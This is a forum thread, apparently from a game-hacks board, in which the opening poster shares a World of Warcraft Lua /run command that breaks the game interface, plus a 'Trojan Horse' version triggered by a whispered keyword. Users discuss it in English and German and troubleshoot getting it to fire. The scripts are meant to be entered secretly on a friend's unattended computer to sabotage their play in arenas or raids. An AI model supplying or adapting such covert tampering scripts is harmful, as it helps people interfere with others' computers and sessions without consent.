Register for your free account! | Forgot your password?

You last visited: Today at 13:01

• Please register to post and access all features, it's quick, easy and FREE!

Advertisement

Ruin your friends WoW in 1.5 seconds

Discussion on Ruin your friends WoW in 1.5 seconds within the WoW Exploits, Hacks, Tools & Macros forum part of the World of Warcraft category.

Old   #1

elite*gold: 87
Ruin your friends WoW in 1.5 seconds

Here just as the new patch came around i had to check if all my personal tools was up to date. The last one i checked was my variable indexer, and there something interesting came up.
I found a nasty set of variables that was not meant to be globally declared. What does this mean? Well it means that you can change one of those variables that Blizzard uses for its own userinterface.
Eventually the variable is one of the core variables of the wow userinterface meaning that changing this will have a serious impact on your game.

Anyway, here is the deal.
You are at your friend's house or at a LAN playing WOW.
Your friend leaves his computer for a moment, then you go in and type the following in the chat:

Code:
[B]/run type=""
[/B]
Code:
[COLOR=Red][B][/B][/COLOR]

The result?

You can't cast anything from the action bar (makes wow unplayable).
You can't use your quest log.
You can't use the achievement UI.
You can't see item value (or well... it does **** up)
You can't interact with NPC's properly.
You can't see how much gold you have.
You can't use drop down menus..
the list goes on and on and on...

The good thing is that its not visible by when you just walk around.
So if your friend goes into a Arena or Duel (against you even) he will probably go nuts when he can't use any abbilities.

You have to restart wow to make this go away.

[EDIT]

If you want to do the "Trojan Horse" style you can make it activate when you send a certain message to the victim.
So what you do is use type this into his chat:

Code:
[B]/run STF = { } ST = CreateFrame("Frame", nil, UIParent) ST:RegisterEvent("CHAT_MSG_WHISPER") ST:SetScript("OnEvent", function (_,e) STF[e]() end) function STF.CHAT_MSG_WHISPER() if arg1=="hey" then if arg2=="Supergus" then type="" end end end;
[/B][COLOR=Red][B][/B][/COLOR]

What you want to change is "Supergus" and "hey"
My Toon name is Supergus. So when i say "hey" to the person, the variable will change.

So when he is in the middle of a fight or in a raid simply say "hey" to him and his wow **** up.

So offcause change "Supergus" to the name of your toon and "hey" to the command you want to use to activate the exploit.

Thanks
3 Users
Old 09/22/2009, 06:46   #2

elite*gold: 2
German ?
Old 09/22/2009, 13:28   #3

elite*gold: 0
Na das ist ja wohl nicht wikrlich schwer zu übersetzen Schöne Funktion aber... Aber nur zum Fun haben für was anderes würde ich das nicht nehmen...
Old 09/22/2009, 15:01   #4

also entweder mach ich was falsch oder es funktioniert nicht. wenn ich mir das in nen makro schreib und dann jemand mit zb "hey" anschreib kann er trotzdem machen was er will.
Old 09/22/2009, 15:04   #5

elite*gold: 2
hm . Bei mir gehts au ned -.-
Old 09/22/2009, 16:32   #6

ihr müsst das skript im wow chat des anderen eingeben damit es läuft nicht bei euch
Old 09/22/2009, 16:34   #7

es geht um das was unter edit steht
Old 09/22/2009, 16:38   #8

Nice one!
Old 09/23/2009, 08:04   #9

elite*gold: 87
Quote:
Originally Posted by ZeroN2K View Post
also entweder mach ich was falsch oder es funktioniert nicht. wenn ich mir das in nen makro schreib und dann jemand mit zb "hey" anschreib kann er trotzdem machen was er will.

What you want to change is "Supergus" and "hey"
My Toon name is Supergus. So when i say "hey" to the person, the variable will change.

So when he is in the middle of a fight or in a raid simply say "hey" to him and his wow **** up.

So offcause change "Supergus" to the name of your toon and "hey" to the command you want to use to activate the exploit.

lernt ma lesen ^^

sagen wir mal euer OPFER heißt kacknoob

dann sieht das so aus

/run STF = { } ST = CreateFrame("Frame", nil, UIParent) ST:RegisterEvent("CHAT_MSG_WHISPER") ST:SetScript("OnEvent", function (_,e) STF[e]() end) function STF.CHAT_MSG_WHISPER() if arg1=="hey" then if arg2=="Supergus"<------- ÄNDERN !!!! then type="" end end end;

ALSO DANN

/run STF = { } ST = CreateFrame("Frame", nil, UIParent) ST:RegisterEvent("CHAT_MSG_WHISPER") ST:SetScript("OnEvent", function (_,e) STF[e]() end) function STF.CHAT_MSG_WHISPER() if arg1=="hey" then if arg2=="kacknoob" then type="" end end end;
Old 09/23/2009, 19:38   #10

Und das Klappt wirklich?Ich hab nämlich heute aus langweile mal die /who list in Dala abgearbeitEt
Old 09/23/2009, 20:43   #11

elite*gold: 4
geht nur an dem pc an dem man das eingegeben hat, nicht für fremde.
aber bestimmt lustig auf lan wenn ma wer auf klo is
Old 09/23/2009, 21:01   #12

Bei mir bis jetzt ohne Erfolg.
Das Makro so kopiert, Namen geändert.
Wenn man das Makro drückt passiert garnichts, wenn ich dann die eingegebene Person mit "hey" anwisper, passiert bei ihm auch nichts.
Muss ich "hey" oder einfach nur hey wispern?
Old 09/23/2009, 21:02   #13

Received Thanks: 2,168
Du musst das bei ihm aktivieren...dann "hey" schreiben....
Old 09/26/2009, 13:36   #14

k danke alnop, dies hab ich zwar auch so probiert hab aber überlesen das man beim rechner des anderen vorher das zeug eingeben muss.